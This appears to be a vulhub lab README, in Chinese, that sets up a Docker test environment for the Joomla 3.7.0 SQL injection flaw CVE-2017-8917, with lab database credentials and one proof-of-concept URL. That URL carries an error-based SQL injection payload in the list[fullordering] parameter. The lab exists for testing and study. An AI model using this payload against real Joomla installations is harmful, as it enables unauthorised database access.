Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

测试环境

编译及启动测试环境:

docker-compose up -d

启动后访问http://your-ip:8080即可看到Joomla的安装界面,当前环境的数据库信息为:

  • 数据库地址:mysql:3306
  • 用户:root
  • 密码:root
  • 数据库名:joomla

填入上述信息,正常安装即可。

POC测试

安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息:

Copied From: vulhub/joomla/CVE-2017-8917